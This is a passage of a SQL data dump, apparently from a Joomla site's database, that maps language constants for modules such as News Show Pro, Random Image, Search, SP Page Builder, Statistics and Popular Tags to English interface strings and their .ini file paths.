URL','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3243,'MOD_NEWS_PRO_GK5_TECHNEWS_REVIEWS_BY','Review by','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3244,'MOD_NEWS_PRO_GK5_PRE_TEXT','Pre text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3245,'MOD_NEWS_PRO_GK5_PRE_TEXT_DESC','Text displayed before module content','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3246,'MOD_NEWS_PRO_GK5_POST_TEXT','Post text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3247,'MOD_NEWS_PRO_GK5_POST_TEXT_DESC','Text displayed after module content','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3248,'COM_MODULES_NSP_PORTAL_MODE_NEW_NEWS_HEADER_FIELDSET_LABEL','New News Header - Portal Mode Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3249,'MOD_NEWS_PRO_GK5_NEW_NEWS_HEADER','New News - Header','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3250,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEW_NEWS_HEADER_LAYOUT','Columns layout','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3251,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEW_NEWS_HEADER_MAIN_2ROWS_2ROWS','Big news - 2 Rows - 2 Rows','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3252,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEW_NEWS_HEADER_4COLS_2COLS','4 Columns - 2 Columns','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3253,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEW_NEWS_HEADER_4ROWS','4 Rows','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3254,'COM_MODULES_NSP_PORTAL_MODE_NEW_NEWS_SLIDER_FIELDSET_LABEL','New News Slider - Portal Mode Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3255,'MOD_NEWS_PRO_GK5_NEW_NEWS_SLIDER','New News - Slider','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3256,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEW_NEWS_SLIDER_AMOUNT','Number of news','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3257,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEW_NEWS_SLIDER_INTERVAL','Autoanimation interval (0 means no autoanimation)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3258,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEW_NEWS_SLIDER_ITEM_WIDTH','Item width (desktop)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3259,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEW_NEWS_SLIDER_ITEM_WIDTH_SMALL_DESKTOP','Item width (small desktop)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3260,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEW_NEWS_SLIDER_ITEM_WIDTH_TABLET','Item width (tablet)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3261,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEW_NEWS_SLIDER_ITEM_WIDTH_MOBILE','Item width (mobile)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3262,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEW_NEWS_SLIDER_ARROWS','Show arrows','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3263,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEW_NEWS_SLIDER_IMAGES','Show images','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3264,'MOD_RANDOM_IMAGE','Random Image','/home/smthsmth/public_html/language/en-GB/en-GB.mod_random_image.ini'),(3265,'MOD_RANDOM_IMAGE_FIELD_FOLDER_DESC','Path to the image folder relative to the site URL (eg images).','/home/smthsmth/public_html/language/en-GB/en-GB.mod_random_image.ini'),(3266,'MOD_RANDOM_IMAGE_FIELD_FOLDER_LABEL','Image Folder','/home/smthsmth/public_html/language/en-GB/en-GB.mod_random_image.ini'),(3267,'MOD_RANDOM_IMAGE_FIELD_HEIGHT_DESC','Image height forces all images to be displayed with the height in pixels.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_random_image.ini'),(3268,'MOD_RANDOM_IMAGE_FIELD_HEIGHT_LABEL','Height (px)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_random_image.ini'),(3269,'MOD_RANDOM_IMAGE_FIELD_LINK_DESC','A URL to redirect to if the image is selected (eg https://www.joomla.org).','/home/smthsmth/public_html/language/en-GB/en-GB.mod_random_image.ini'),(3270,'MOD_RANDOM_IMAGE_FIELD_LINK_LABEL','Link','/home/smthsmth/public_html/language/en-GB/en-GB.mod_random_image.ini'),(3271,'MOD_RANDOM_IMAGE_FIELD_TYPE_DESC','Type of image PNG/GIF/JPG etc (the default is JPG).','/home/smthsmth/public_html/language/en-GB/en-GB.mod_random_image.ini'),(3272,'MOD_RANDOM_IMAGE_FIELD_TYPE_LABEL','Image Type','/home/smthsmth/public_html/language/en-GB/en-GB.mod_random_image.ini'),(3273,'MOD_RANDOM_IMAGE_FIELD_WIDTH_DESC','Image width forces all images to be displayed with this width in pixels.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_random_image.ini'),(3274,'MOD_RANDOM_IMAGE_FIELD_WIDTH_LABEL','Width (px)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_random_image.ini'),(3275,'MOD_RANDOM_IMAGE_NO_IMAGES','No Images','/home/smthsmth/public_html/language/en-GB/en-GB.mod_random_image.ini'),(3276,'MOD_RANDOM_IMAGE_XML_DESCRIPTION','This module displays a random image from your chosen folder.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_random_image.ini'),(3277,'MOD_RANDOM_IMAGE','Random Image','/home/smthsmth/public_html/language/en-GB/en-GB.mod_random_image.sys.ini'),(3278,'MOD_RANDOM_IMAGE_XML_DESCRIPTION','This module displays a random image from your chosen folder.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_random_image.sys.ini'),(3279,'MOD_RANDOM_IMAGE_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_random_image.sys.ini'),(3280,'MOD_RELATED_FIELD_MAX_DESC','The maximum number of related articles to display (default is 5).','/home/smthsmth/public_html/language/en-GB/en-GB.mod_related_items.ini'),(3281,'MOD_RELATED_FIELD_MAX_LABEL','Maximum Articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_related_items.ini'),(3282,'MOD_RELATED_FIELD_SHOWDATE_DESC','Show or hide date.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_related_items.ini'),(3283,'MOD_RELATED_FIELD_SHOWDATE_LABEL','Show Date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_related_items.ini'),(3284,'MOD_RELATED_ITEMS','Articles - Related','/home/smthsmth/public_html/language/en-GB/en-GB.mod_related_items.ini'),(3285,'MOD_RELATED_XML_DESCRIPTION','This module displays other Articles that are related to the one being viewed. These relations are established by the Meta keywords. <br />All the keywords of the current Article are searched against all the keywords of all other published Articles. For example, you may have an Article on "Breeding Parrots" and another on "Hand Raising Black Cockatoos". If you include the keyword "parrot" in both Articles, then the Related Items Module will list the "Breeding Parrots" Article when viewing "Hand Raising Black Cockatoos" and vice-versa.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_related_items.ini'),(3286,'MOD_RELATED_ITEMS','Articles - Related','/home/smthsmth/public_html/language/en-GB/en-GB.mod_related_items.sys.ini'),(3287,'MOD_RELATED_XML_DESCRIPTION','This module displays other Articles that are related to the one being viewed. These relations are established by the Meta keywords. <br />All the keywords of the current Article are searched against all the keywords of all other published Articles. For example, you may have an Article on "Breeding Parrots" and another on "Hand Raising Black Cockatoos". If you include the keyword "parrot" in both Articles, then the Related Items Module will list the "Breeding Parrots" Article when viewing "Hand Raising Black Cockatoos" and vice-versa.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_related_items.sys.ini'),(3288,'MOD_RELATED_ITEMS_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_related_items.sys.ini'),(3289,'MOD_SEARCH','Search','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3290,'MOD_SEARCH_FIELD_BOXWIDTH_DESC','Size of the search text box in characters.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3291,'MOD_SEARCH_FIELD_BOXWIDTH_LABEL','Box Width','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3292,'MOD_SEARCH_FIELD_BUTTON_DESC','Display a search button.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3293,'MOD_SEARCH_FIELD_BUTTON_LABEL','Search Button','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3294,'MOD_SEARCH_FIELD_BUTTONPOS_DESC','Position of the button relative to the search box.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3295,'MOD_SEARCH_FIELD_BUTTONPOS_LABEL','Button Position','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3296,'MOD_SEARCH_FIELD_BUTTONTEXT_DESC','The text that appears in the search button. If left blank, it will load the \'searchbutton\' string from your language file.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3297,'MOD_SEARCH_FIELD_BUTTONTEXT_LABEL','Button Text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3298,'MOD_SEARCH_FIELD_IMAGEBUTTON_DESC','Use an image as button. This image has to be named searchButton.gif and must be located in templates/*your template name*/images/.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3299,'MOD_SEARCH_FIELD_IMAGEBUTTON_LABEL','Search Button Image','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3300,'MOD_SEARCH_FIELD_SETITEMID_DESC','Assign an ItemID by selecting a menu item in the list for the display of the search results if there is no com_search menu and a specific display is desired. If you do not know what this means, you may not need it.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3301,'MOD_SEARCH_FIELD_SETITEMID_LABEL','Set ItemID','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3302,'MOD_SEARCH_FIELD_LABEL_TEXT_DESC','The text that appears in the label of search box. If left blank, it will load \'label\' string from your language file.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3303,'MOD_SEARCH_FIELD_LABEL_TEXT_LABEL','Box Label','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3304,'MOD_SEARCH_FIELD_OPENSEARCH_LABEL','OpenSearch Autodiscovery','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3305,'MOD_SEARCH_FIELD_OPENSEARCH_TEXT_LABEL','OpenSearch Title','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3306,'MOD_SEARCH_FIELD_OPENSEARCH_TEXT_DESC','Text displayed in supported browsers when adding your site as a search provider.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3307,'MOD_SEARCH_FIELD_OPENSEARCH_DESC','Some browsers can add support for your site\'s search if this option is enabled.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3308,'MOD_SEARCH_FIELD_TEXT_DESC','The text that appears in the search text box. If left blank, it will load the \'searchbox\' string from your language file.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3309,'MOD_SEARCH_FIELD_TEXT_LABEL','Box Text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3310,'MOD_SEARCH_FIELD_VALUE_BOTTOM','Bottom','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3311,'MOD_SEARCH_FIELD_VALUE_LEFT','Left','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3312,'MOD_SEARCH_FIELD_VALUE_RIGHT','Right','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3313,'MOD_SEARCH_FIELD_VALUE_TOP','Top','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3314,'MOD_SEARCH_LABEL_TEXT','Search ...','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3315,'MOD_SEARCH_SEARCHBOX_TEXT','Search ...','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3316,'MOD_SEARCH_SEARCHBUTTON_TEXT','Search','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3317,'MOD_SEARCH_SELECT_MENU_ITEMID','Select a menu item','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3318,'MOD_SEARCH_XML_DESCRIPTION','This module will display a search box.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.ini'),(3319,'MOD_SEARCH','Search','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.sys.ini'),(3320,'MOD_SEARCH_XML_DESCRIPTION','This module will display a search box.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.sys.ini'),(3321,'MOD_SEARCH_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_search.sys.ini'),(3322,'MOD_SPPAGEBUILDER','SP Page Builder','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3323,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_NAME','Name','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3324,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_EMAIL','Email','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3325,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SUBJECT','Subject','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3326,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_MESSAGE','Message','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3327,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SEND','Send Message','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3328,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_WRONG_CAPTCHA','Wrong answer! Please enter right answer.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3329,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SUCCESS','Email sent successfully!','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3330,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_FAILED','Email sent failed.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3331,'COM_SPPAGEBUILDER_TWEET_FOLLOWERS','Followers','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3332,'COM_SPPAGEBUILDER_TWEET_FOLLOW','Follow','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3333,'COM_SPPAGEBUILDER_SECOND','Second','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3334,'COM_SPPAGEBUILDER_SECONDS','Seconds','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3335,'COM_SPPAGEBUILDER_MINUTE','Minute','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3336,'COM_SPPAGEBUILDER_MINUTES','Minutes','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3337,'COM_SPPAGEBUILDER_HOUR','Hour','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3338,'COM_SPPAGEBUILDER_HOURS','Hours','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3339,'COM_SPPAGEBUILDER_DAY','Day','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3340,'COM_SPPAGEBUILDER_DAYS','Days','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3341,'COM_SPPAGEBUILDER_MONTHS','Months','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3342,'COM_SPPAGEBUILDER_MONTH','Month','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3343,'COM_SPPAGEBUILDER_YEAR','Year','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3344,'COM_SPPAGEBUILDER_YEARS','Years','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3345,'COM_SPPAGEBUILDER_AGO','ago','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3346,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_TOTAL_SHARES','Shares','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3347,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_FACEBOOK','Facebook','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3348,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_TWITTER','Twitter','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3349,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_GOOGLE_PLUS','Google Plus','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3350,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_LINKEDIN','Linkedin','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3351,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_PINTEREST','Pinterest','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3352,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_THUMBLR','Thublr','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3353,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_GETPOCKET','Getpocket','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3354,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_REDDIT','Reddit','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3355,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_VK','VK','/home/smthsmth/public_html/language/en-GB/en-GB.mod_sppagebuilder.ini'),(3356,'MOD_STATS','Statistics','/home/smthsmth/public_html/language/en-GB/en-GB.mod_stats.ini'),(3357,'MOD_STATS_ARTICLES','Articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_stats.ini'),(3358,'MOD_STATS_ARTICLES_VIEW_HITS','Articles View Hits','/home/smthsmth/public_html/language/en-GB/en-GB.mod_stats.ini'),(3359,'MOD_STATS_CACHING','Caching','/home/smthsmth/public_html/language/en-GB/en-GB.mod_stats.ini'),(3360,'MOD_STATS_FIELD_COUNTER_DESC','Display hit counter.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_stats.ini'),(3361,'MOD_STATS_FIELD_COUNTER_LABEL','Hit Counter','/home/smthsmth/public_html/language/en-GB/en-GB.mod_stats.ini'),(3362,'MOD_STATS_FIELD_INCREASECOUNTER_DESC','Enter the number of hits to increase the counter by.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_stats.ini'),(3363,'MOD_STATS_FIELD_INCREASECOUNTER_LABEL','Increase Counter','/home/smthsmth/public_html/language/en-GB/en-GB.mod_stats.ini'),(3364,'MOD_STATS_FIELD_SERVERINFO_DESC','Display server information.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_stats.ini'),(3365,'MOD_STATS_FIELD_SERVERINFO_LABEL','Server Information','/home/smthsmth/public_html/language/en-GB/en-GB.mod_stats.ini'),(3366,'MOD_STATS_FIELD_SITEINFO_DESC','Display site information.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_stats.ini'),(3367,'MOD_STATS_FIELD_SITEINFO_LABEL','Site Information','/home/smthsmth/public_html/language/en-GB/en-GB.mod_stats.ini'),(3368,'MOD_STATS_GZIP','Gzip','/home/smthsmth/public_html/language/en-GB/en-GB.mod_stats.ini'),(3369,'MOD_STATS_MYSQL','MySQL','/home/smthsmth/public_html/language/en-GB/en-GB.mod_stats.ini'),(3370,'MOD_STATS_OS','OS','/home/smthsmth/public_html/language/en-GB/en-GB.mod_stats.ini'),(3371,'MOD_STATS_PHP','PHP','/home/smthsmth/public_html/language/en-GB/en-GB.mod_stats.ini'),(3372,'MOD_STATS_TIME','Time','/home/smthsmth/public_html/language/en-GB/en-GB.mod_stats.ini'),(3373,'MOD_STATS_USERS','Users','/home/smthsmth/public_html/language/en-GB/en-GB.mod_stats.ini'),(3374,'MOD_STATS_WEBLINKS','Web Links','/home/smthsmth/public_html/language/en-GB/en-GB.mod_stats.ini'),(3375,'MOD_STATS_XML_DESCRIPTION','The Statistics Module shows information about your server installation together with statistics on the website users and the number of Articles in your database.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_stats.ini'),(3376,'MOD_STATS','Statistics','/home/smthsmth/public_html/language/en-GB/en-GB.mod_stats.sys.ini'),(3377,'MOD_STATS_XML_DESCRIPTION','The Statistics Module shows information about your server installation together with statistics on the website users and the number of Articles in your database.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_stats.sys.ini'),(3378,'MOD_STATS_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_stats.sys.ini'),(3379,'MOD_SYNDICATE','Syndication Feeds','/home/smthsmth/public_html/language/en-GB/en-GB.mod_syndicate.ini'),(3380,'MOD_SYNDICATE_DEFAULT_FEED_ENTRIES','Feed Entries','/home/smthsmth/public_html/language/en-GB/en-GB.mod_syndicate.ini'),(3381,'MOD_SYNDICATE_FIELD_DISPLAYTEXT_DESC','If set to \'Yes\', text will be displayed next to the icon.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_syndicate.ini'),(3382,'MOD_SYNDICATE_FIELD_DISPLAYTEXT_LABEL','Display Text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_syndicate.ini'),(3383,'MOD_SYNDICATE_FIELD_FORMAT_DESC','Select the format for the Syndication Feed.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_syndicate.ini'),(3384,'MOD_SYNDICATE_FIELD_FORMAT_LABEL','Feed Format','/home/smthsmth/public_html/language/en-GB/en-GB.mod_syndicate.ini'),(3385,'MOD_SYNDICATE_FIELD_TEXT_DESC','If \'Display Text\' is activated, the text entered will be displayed next to the icon along with the RSS Link. If this field is left empty, the default text displayed will be picked from the site language ini file.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_syndicate.ini'),(3386,'MOD_SYNDICATE_FIELD_TEXT_LABEL','Text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_syndicate.ini'),(3387,'MOD_SYNDICATE_FIELD_VALUE_ATOM','Atom 1.0','/home/smthsmth/public_html/language/en-GB/en-GB.mod_syndicate.ini'),(3388,'MOD_SYNDICATE_FIELD_VALUE_RSS','RSS 2.0','/home/smthsmth/public_html/language/en-GB/en-GB.mod_syndicate.ini'),(3389,'MOD_SYNDICATE_XML_DESCRIPTION','Smart Syndication Module that creates a Syndicated Feed for the page where the Module is displayed.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_syndicate.ini'),(3390,'MOD_SYNDICATE','Syndication Feeds','/home/smthsmth/public_html/language/en-GB/en-GB.mod_syndicate.sys.ini'),(3391,'MOD_SYNDICATE_XML_DESCRIPTION','Smart Syndication Module that creates a Syndicated Feed for the page where the Module is displayed.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_syndicate.sys.ini'),(3392,'MOD_SYNDICATE_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_syndicate.sys.ini'),(3393,'MOD_TAGS_POPULAR','Tags - Popular','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3394,'MOD_TAGS_POPULAR_FIELD_ALL_TIME','All time','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3395,'MOD_TAGS_POPULAR_FIELD_DISPLAY_COUNT_DESC','Choose if the number of tagged items should be displayed next to each tag.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3396,'MOD_TAGS_POPULAR_FIELD_DISPLAY_COUNT_LABEL','Display Number of Items','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3397,'MOD_TAGS_POPULAR_FIELD_LAST_DAY','Last day','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3398,'MOD_TAGS_POPULAR_FIELD_LAST_HOUR','Last hour','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3399,'MOD_TAGS_POPULAR_FIELD_LAST_MONTH','Last month','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3400,'MOD_TAGS_POPULAR_FIELD_LAST_WEEK','Last week','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3401,'MOD_TAGS_POPULAR_FIELD_LAST_YEAR','Last year','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3402,'MOD_TAGS_POPULAR_FIELD_MAX_DESC','Sets the maximum number of tags to display in the module. Enter "0" to display all tags.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3403,'MOD_TAGS_POPULAR_FIELD_MAX_LABEL','Maximum Tags','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3404,'MOD_TAGS_POPULAR_FIELD_MAXSIZE_DESC','The maximum font size used for the tags, proportional to the site\'s default font size (eg "2" means 200% of the default size).','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3405,'MOD_TAGS_POPULAR_FIELD_MAXSIZE_LABEL','Maximum Font Size','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3406,'MOD_TAGS_POPULAR_FIELD_MINSIZE_DESC','The minimum font size used for the tags, proportional to the site\'s default font size (eg "2" means 200% of the default size).','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3407,'MOD_TAGS_POPULAR_FIELD_MINSIZE_LABEL','Minimum Font Size','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3408,'MOD_TAGS_POPULAR_FIELD_NO_RESULTS_DESC','Will show a message if no matching tags are found instead of hiding the module.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3409,'MOD_TAGS_POPULAR_FIELD_NO_RESULTS_LABEL','Show "No results" text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3410,'MOD_TAGS_POPULAR_FIELD_ORDER_VALUE_COUNT','Number of Items','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3411,'MOD_TAGS_POPULAR_FIELD_ORDER_VALUE_DESC','The order that tags will show in.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3412,'MOD_TAGS_POPULAR_FIELD_ORDER_VALUE_LABEL','Order','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3413,'MOD_TAGS_POPULAR_FIELD_ORDER_VALUE_RANDOM','Random','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3414,'MOD_TAGS_POPULAR_FIELD_ORDER_VALUE_TITLE','Title','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3415,'MOD_TAGS_POPULAR_FIELD_TIMEFRAME_DESC','Sets the time period for which to calculate popularity.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3416,'MOD_TAGS_POPULAR_FIELD_TIMEFRAME_LABEL','Time Period','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3417,'MOD_TAGS_POPULAR_FIELDSET_CLOUD_LABEL','Cloud Layout','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3418,'MOD_TAGS_POPULAR_MAX_DESC','Sets the maximum number of tags to display in the module.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3419,'MOD_TAGS_POPULAR_MAX_LABEL','Maximum Tags','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3420,'MOD_TAGS_POPULAR_NO_ITEMS_FOUND','No Tags found.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3421,'MOD_TAGS_POPULAR_PARENT_TAG_DESC','Limit tags shown to the children of this Parent Tag.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3422,'MOD_TAGS_POPULAR_PARENT_TAG_LABEL','Parent Tag','/home/smthsmth/public_html/language/en-GB/en-GB.mod_tags_popular.ini'),(3423,'MOD_TAGS_POPULAR_XML_DESCRIPTION','This module displays 